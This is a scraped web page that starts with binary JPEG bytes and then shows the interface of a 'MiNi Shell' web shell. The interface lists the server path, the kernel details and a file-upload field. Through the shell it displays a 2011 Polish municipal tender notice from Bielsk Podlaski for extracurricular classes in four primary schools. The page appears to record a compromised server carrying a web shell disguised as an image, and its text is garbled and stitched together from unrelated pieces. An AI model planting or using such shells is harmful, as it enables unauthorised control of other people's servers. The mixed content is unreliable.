JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110301/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110301/33004-N-2011.html

<p class="kh_header"><b>Bielsk Podlaski: Realizacja standardu IV i standardu V wynikającego z procesu indywidualizacji nauczania w klasach I - III we wszystkich szkołach podstawowych w Bielsku Podlaskim</b><br>
<b>Numer ogłoszenia: 33004 - 2011; data zamieszczenia: 01.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Bielsk Podlaski , ul. Kopernika 1, 17-100 Bielsk Podlaski, woj. podlaskie, tel. 0-85 73 18 100, faks 0-85 73 18 150.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bielsk-podlaski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja standardu IV i standardu V wynikającego z procesu indywidualizacji nauczania w klasach I - III we wszystkich szkołach podstawowych w Bielsku Podlaskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa polegająca na prowadzeniu zajęć pozalekcyjnych dla uczniów klas I - III w czterech szkołach podstawowych w ramach projektu dofinansowanego ze środków Unii Europejskiej pod nazwą: Realizacja standardu IV i standardu V wynikającego z procesu indywidualizacji nauczania w klasach I - III we wszystkich szkołach podstawowych w Bielsku Podlaskim, w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.

Celem głównym projektu jest wyrównanie szans edukacyjnych poprzez indywidualizację  procesu kształcenia dzieci z klas I - III we wszystkich szkołach podstawowych dla których organem prowadzącym jest Miasto Bielsk Podlaski, w tym zapewnienie każdemu dziecku realizującemu I etap edukacyjny w szkołach podstawowych oferty edukacyjno-wychowaczo-profilaktycznej, zgodnej z jego indywidualnymi potrzebami i możliwościami edukacyjnymi i rozwojowymi, zwiększenia stopnia i zakresu wykorzystania w szkołach podstawowych aktywizujących metod nauczania, poprawa zdolności zdobywania umiejętności w różnym zakresie u dzieci uczęszczających do szkół podstawowych, zmniejszenie zaburzeń umiejętności szkolnych występujących u uczniów i uczennic szkół podstawowych. 
W zależności od zdiagnozowanych potrzeb edukacyjnych, będą prowadzone zajęcia:
1) dla dzieci z trudnościami i zaburzeniami - w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji, rozwoju mowy, komunikacji społecznej (socjoterapeutyczne i psychoedukacyjne), w zdobywaniu umiejętności polonistycznych, matematycznych, oraz z wadami postawy (gimnastyka korekcyjna);
2) specjalistyczne - kinezjologia, terapia sztuką, biblioterapia;
3) rozwijające zainteresowania uczniów szczególnie uzdolnionych poprzez realizację zajęć z uwzględnieniem nauk matematyczno-przyrodniczych, zajęć przyrodniczych, matematycznych, polonistycznych, muzycznych, edukacji ekologiczno-przyrodniczej, edukacji artystycznej, koła teatralnego, zajęć komputerowych, zajęć z języka angielskiego.
2. Prowadzący zajęcia pozalekcyjne będzie odpowiadał za przygotowanie, realizację i dokumentację zajęć dodatkowych dla uczniów. Zajęcia będą realizowane w szkołach objętych projektem w dniach nauki szkolnej. Wykonawcy zobowiązani będą świadczyć usługi edukacyjne według harmonogramów uzgodnionych i zatwierdzonych przez dyrektorów szkół.
Obowiązki prowadzącego zajęcia pozalekcyjne:
1) opracowanie programu i planu zajęć pozalekcyjnych oraz przeprowadzenie ich w terminie określonym w projekcie i SIWZ,
2) dokumentowanie zajęć pozalekcyjnych (prowadzenie kart pracy, dzienników zajęć, list obecności),
3) pomoc dyrektorowi szkoły w której prowadzone są zajęcia w przygotowaniu sprawozdań miesięcznych z realizacji zajęć poprzez sporządzanie sprawozdań,
4) szczegółowe obowiązki ujęte zostały w  projekcie umowy
3. Podział postępowania na części w zależności od miejsca wykonywania usługi (adres szkoły) oraz rodzaju edukacyjnych zajęć pozalekcyjnych:

Części od 1-13	miejsce wykonywania usługi - SZKOŁA PODSTAWOWA Nr 2
1) zajęcia dla dzieci z trudnościami i zaburzeniami:
Część 1	w zdobywaniu umiejętności polonistycznych (kl. I b) - 30 godzin
Część 2	w zdobywaniu umiejętności polonistycznych (kl. II b) - 30 godzin
Część 3	w zdobywaniu umiejętności matematycznych (kl. II a) - 30 godzin
Część 4	w  rozwoju mowy (zajęcia logopedyczne) - 60 godz
Część 5	w komunikacji społecznej (zajęcia socjoterapeutyczne) - 30 godzin, w tym:
	a) nauczyciel prowadzący - 30 godzin
	b) nauczyciel lustro - 30 godzin
2) zajęcia rozwijające zainteresowania uczniów:
Część 6	szczególnie uzdolnionych z uwzględnieniem nauk matematyczno-przyrodniczych (kl. II a) - 30 godzin
Część 7	szczególnie uzdolnionych- koło teatralne (kl. I b) - 30 godzin
Część 8	szczególnie uzdolnionych - zajęcia przyrodnicze (kl. I a) - 30 godzin
Część 9	szczególnie uzdolnionych - zajęcia matematyczne (kl. I a) - 30 godzin
Część 10	szczególnie uzdolnionych - zajęcia matematyczne (kl. II b) - 30 godzin
Część 11	szczególnie uzdolnionych - zajęcia matematyczne (kl. III a) - 30 godzin
Część 12	szczególnie uzdolnionych - zajęcia polonistyczne (kl. III b) - 30 godzin
Część 13	szczególnie uzdolnionych - zajęcia muzyczne - 30 godzin

Części od 14-30 miejsce wykonywania usługi -  SZKOŁA PODSTAWOWA NR 3
1) zajęcia dla dzieci z trudnościami i zaburzeniami:
Część 14	w czytaniu i pisaniu, w tym  zagrożonych ryzykiem dysleksji (kl. II a i II c) - 45 godzin
Część 15	w czytaniu i pisaniu, w tym  zagrożonych ryzykiem dysleksji (kl. II b) - 45 godzin
Część 16	w czytaniu i pisaniu, w tym  zagrożonych ryzykiem dysleksji (kl. I b) - 45 godzin
Część 17	w czytaniu i pisaniu, w tym  zagrożonych ryzykiem dysleksji (kl. I a) - 45 godzin
Część 18	w zdobywaniu umiejętności matematycznych - 45 godzin
Część 19	w  rozwoju mowy (zajęcia logopedyczne) - 35 godzin
Część 20	w komunikacji społecznej (zajęcia socjoterapeutyczne) - 35 godzin, w tym:
	a) nauczyciel prowadzący - 35 godzin
	b) nauczyciel lustro - 35 godzin
Część 21	w komunikacji społecznej (zajęcia psychoedukacyjne) - 35 godzin
Część 22	wad postawy (gimnastyka korekcyjna) - 35 godzin (kl. I b)
2) specjalistyczne zajęcia terapeutyczne:

Część 23	kinezjologia - 35 godzin
Część 24	terapia sztuką - 35 godzin
Część 25	biblioterapia - 35 godzin
3) zajęcia rozwijające zainteresowania uczniów:
Część 26	szczególnie uzdolnionych - zajęcia matematyczne (kl. III) - 35 godzin
Część 27	szczególnie uzdolnionych - zajęcia matematyczne (kl. II) - 45 godzin
Część 28	szczególnie uzdolnionych - zajęcia przyrodnicze (kl. III) - 35 godzin
Część 29	szczególnie uzdolnionych - zajęcia przyrodnicze (kl. II) - 45 godzin
Część 30	szczególnie uzdolnionych - zajęcia polonistyczne (kl. III) - 35 godzin
	
Części od 31-41	miejsce wykonywania usługi - SZKOŁA PODSTAWOWA NR 4
1) zajęcia dla dzieci z trudnościami i zaburzeniami:
Część 31	w czytaniu i pisaniu, w tym  zagrożonych ryzykiem dysleksji (kl. I a-c) - 30 godzin
Część 32	w czytaniu i pisaniu, w tym  zagrożonych ryzykiem dysleksji (kl. IIb i IIc) - 35 godzin
Część 33	w zdobywaniu umiejętności matematycznych (kl. III c)- 30 godzin
Część 34	w  rozwoju mowy (zajęcia logopedyczne) - 35 godzin
Część 35	w komunikacji społecznej (zajęcia socjoterapeutyczne) - 35 godzin
Część 36	wad postawy (gimnastyka korekcyjna) - 35 godzin
2) zajęcia rozwijające zainteresowania uczniów:
Część 37	szczególnie uzdolnionych z uwzględnieniem nauk matematyczno-przyrodniczych (kl. I c) - 35 godzin
Część 38	szczególnie uzdolnionych z uwzględnieniem nauk matematyczno-przyrodniczych (kl. I a)) - 35 godzin
Część 39	szczególnie uzdolnionych - edukacja ekologiczno-przyrodnicza (kl. III b) - 30 godzin
Część 40	szczególnie uzdolnionych - edukacja artystyczna (kl. II a) - 35 godzin
Część 41	szczególnie uzdolnionych - edukacja artystyczna (kl. II b) - 35 godzin

Części od 42-52	miejsce wykonywania usługi - SZKOŁA PODSTAWOWA NR 5
1) zajęcia dla dzieci z trudnościami i zaburzeniami:
Część 42	w czytaniu i pisaniu, w tym  zagrożonych ryzykiem dysleksji (kl. b) - 45 godzin
Część 43	w czytaniu i pisaniu, w tym  zagrożonych ryzykiem dysleksji (kl. I a) - 45 godzin
Część 44	w czytaniu i pisaniu, w tym  zagrożonych ryzykiem dysleksji (kl. III b) - 30 godzin
Część 45	w zdobywaniu umiejętności matematycznych (kl. III a) - 30 godzin
Część 46	wad postawy (gimnastyka korekcyjna) (kl. I a) - 60 godzin
Część 47	wad postawy (gimnastyka korekcyjna) (kl. I b) - 60 godzin
2) specjalistyczne zajęcia terapeutyczne:
Część 48	biblioterapia - 60 godzin
3) zajęcia rozwijające zainteresowania uczniów:
Część 49	szczególnie uzdolnionych - zajęcia matematyczne (kl. II a) - 60 godzin
Część 50	szczególnie uzdolnionych - zajęcia matematyczne (kl. II b) - 60 godzin
Część 51	szczególnie uzdolnionych - zajęcia z języka angielskiego - 60 godzin
Część 52	szczególnie uzdolnionych - zajęcia komputerowe - 60 godzin

Ze względu na specyfikę przedmiotu zamówienia konieczne jest prowadzenie zajęć pozalekcyjnych  z dziećmi z danej szkoły i na terenie danej placówki. Ponadto zajęcia mają być prowadzone w oparciu o autorskie programy, oznacza to, że wykonawca musi prowadzić zajęcia samodzielnie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5, 80.41.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 52.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  w celu potwierdzenia dysponowania osobami zdolnymi do wykonania zamówienia musi wykazać, że dysponuje zespołem zdolnym do realizacji zamówienia, a w szczególności osobą posiadającą wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym  oraz dodatkowo wymagane kwalifikacje do realizacji poszczególnych części zamówienia (wg załącznika Nr 3 do SIWZ)  : 
- część 1, 2, 3, 6, 7, 8, 9, 10, 11, 12, 14, 15, 16, 17, 18, 26, 27, 28, 29, 30, 31, 32, 33, 37, 38, 39, 40, 41, 42, 43, 44, 45, 49, 50 - kwalifikacje do nauczania w klasach I - III szkoły podstawowej, 
     - część 4, 19, 34 - kwalifikacje do prowadzenia zajęć logopedycznych,
- część 22, 36, 46, 47 - kwalifikacje do prowadzenia gimnastyki korekcyjnej,
- część 23, 24, 25, 48 - kwalifikacje do prowadzenia zajęć terapeutycznych,
- część 5a, 20a, 35 - nauczyciel prowadzący - kwalifikacje do prowadzenia zajęć socjoterapeutycznych,
- część 21 - kwalifikacje do prowadzenia zajęć psychoedukacyjnych,
- część 13 - kwalifikacje do nauczania muzyki,
- część 51 - kwalifikacje do nauczania języka angielskiego,
- część 52 - kwalifikacje do nauczania informatyki.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy wg załącznika Nr 1 do SIWZ
2. Pełnomocnictwo - w przypadku, gdy oferta została podpisana przez pełnomocnika lub gdy została złożona przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Dopuszcza się zmianę postanowień zawartej umowy, w stosunku do treści oferty, w następującym zakresie i przy spełnieniu następujących warunków:
1)	zmiana okresu realizacji umowy w przypadku niemożności wykonania umowy przez Zleceniobiorcę, o którym mowa w § 6 ,
2) zmiana w obowiązujących przepisach prawa w zakresie mającym wpływ na realizację umowy,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bielsk-podlaski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miasto Bielsk Podlaski, ul. Kopernika 1, 17-100 Bielsk Podlaski, pokój Nr 27.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2011 godzina 10:00, miejsce: Miasto Bielsk Podlaski ul. Kopernika 1, 17-100 Bielsk Podlaski, biuro podawcze - parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach  Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com